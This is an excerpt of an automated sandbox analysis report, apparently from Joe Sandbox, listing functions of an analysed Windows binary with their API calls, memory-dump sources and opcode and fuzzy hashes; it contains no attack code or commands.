                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5A8A
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F5B2E
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5B3D
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000002), ref: 004F5B78
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5B8A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 42192e3c7faa4449eaa7148df56c5331408008ed83f87a65c0d534a8c29348b8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE41B634300B0D5BD7259F319894BBB77A9AF80704F08415EEB6A8B392DB18FC15D768
                                                                                                                                                                                                                                                                                                        Function 004F26C0 Relevance: 7.6, APIs: 5, Instructions: 84timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,?), ref: 004F274C
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,?), ref: 004F277D
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 004F2787
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM(?,?), ref: 004F2792
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?), ref: 004F27C6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Timetime$CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1404962471-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9d8894fa7cd5c1a3a8d1574b016894ebc4e8e1121a62fd2c9071eafdbb47ea2c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B531BC35208B049BC314DF25E9956ABB7F1FFC9720F148A2DE4EA83390DB34A419CB56
                                                                                                                                                                                                                                                                                                        Function 005293B0 Relevance: 7.6, APIs: 5, Instructions: 77sleepCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 00529421
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,08000041,?,?,00529592,?,?), ref: 00529431
                                                                                                                                                                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 0052943A
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(00000378,00000000), ref: 0052944F
                                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 0052947B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExchangeInterlocked$Compare$Sleep__aulldiv
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1430435781-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                                                                                                                                                                        • Instruction ID: c7c6432b147b16162d76303af8a74e071e756cb34c164aed74e4a8b1f06fd785
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C215AB15007409FD7219F2A9844A67FEFCFFA1705F10851FA45A873A1D7B4A904CB64
                                                                                                                                                                                                                                                                                                        Function 004F5CB0 Relevance: 7.6, APIs: 6, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3111dceef54b192a201187cebb12310cd19e01e5115420dd7c98ed3fae01612e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2921A73520174A4BD710AF66E888BFFB7B8EB60305F00852FEB4643251C779A84ADB64
                                                                                                                                                                                                                                                                                                        Function 004D8010 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 004D802E
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 004D8044
                                                                                                                                                                                                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 004D8067
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 004D8075
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004D8078
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Object$Select$BrushCreateDeleteFillRectSolid
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3777265051-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                                                                                                                                                                        • Instruction ID: d8a686452ba02d7e488f009474b8275e6b936404318e954abf19810798465268
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76019A752042046FC304DB69ED88C6B7BF8EACD614B000A5DFA8983312E635E806DB71
                                                                                                                                                                                                                                                                                                        Function 004E4660 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E468C
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,0041D485), ref: 004E46A2
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D0
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D9
                                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46E6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Delete$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3104255891-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                                                                                                                                                                        • Instruction ID: c031ed0988ac34fb64eb35ca7992c3622ed3d26c78e5592643255ae209dbdd49
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D101D4B750060C5BC2106B35EC81BAF73A8AFC4214F05051EF54F93241DA68B8088BA1
                                                                                                                                                                                                                                                                                                        Function 004D9C20 Relevance: 7.5, APIs: 5, Instructions: 30clipboardCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 004D9C27
                                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 004D9C3A
                                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 004D9C42
                                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(00000000), ref: 004D9C4B
                                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 004D9C56
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Clipboard$Data$CloseOpen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 464010812-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2f18cbc0f6c8a3dbd26954e8439ab7c802a903eab365c315afdcc22c9d276e9e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41E09AB230022517EB9026BA6C4CF97A2EC9F54F90F050123F604C6340E6A6CC0457B1
                                                                                                                                                                                                                                                                                                        Function 004CFD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileAttributesExA.KERNEL32(?,00000000,?,00000000,2E736D6D,?,?,?,?,?,?,?,?,0041C852,00000000,?), ref: 004CFE0F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                                                                                                                                                                        • GetFileAttributesExW.KERNEL32(00000000,00000000,?,?,?,00000000,2E736D6D,?,?,?,?,?,?,?,?,0041C852), ref: 004CFDAF
                                                                                                                                                                                                                                                                                                        • GetFileAttributesExA.KERNEL32(00000000,00000000,?,2E736D6D,?,?,?,?,?,?,?,?,0041C852,00000000,?,00000000), ref: 004CFDED
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile$Version
                                                                                                                                                                                                                                                                                                        • String ID: \\?\
                                                                                                                                                                                                                                                                                                        • API String ID: 3849939888-4282027825
                                                                                                                                                                                                                                                                                                        • Opcode ID: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                                                                                                                                                                        • Instruction ID: f991edffad243b4bd670aca913d189ed867c40d808b57564552852d0b3f79ee3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6431277A90031067D710AA65AC42FEB73995F85704F54042FF90687352EB6D9C0EC2EA
                                                                                                                                                                                                                                                                                                        Function 004FA670 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,00000000), ref: 004FA67B
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004FA749
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F9B30: EnterCriticalSection.KERNEL32(?,00000000,?,004FA7A6,?,?,00153804), ref: 004F9B35
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F9B30: LeaveCriticalSection.KERNEL32(?), ref: 004F9B84
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000100,00000000,00000000,?), ref: 004FA715
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                        • String ID: FriendlyName
                                                                                                                                                                                                                                                                                                        • API String ID: 904232820-3623505368
                                                                                                                                                                                                                                                                                                        • Opcode ID: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4f25218f4a75fa1caa45750efdb6ff353ea89136e06b91a5ad3ed6f7a0914714
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A212A75244301AFD220EB54DC49F5BB7F8BF88714F008A1DFA899B290D774F8098BA6
                                                                                                                                                                                                                                                                                                        Function 004CAB90 Relevance: 6.2, APIs: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004CADB4
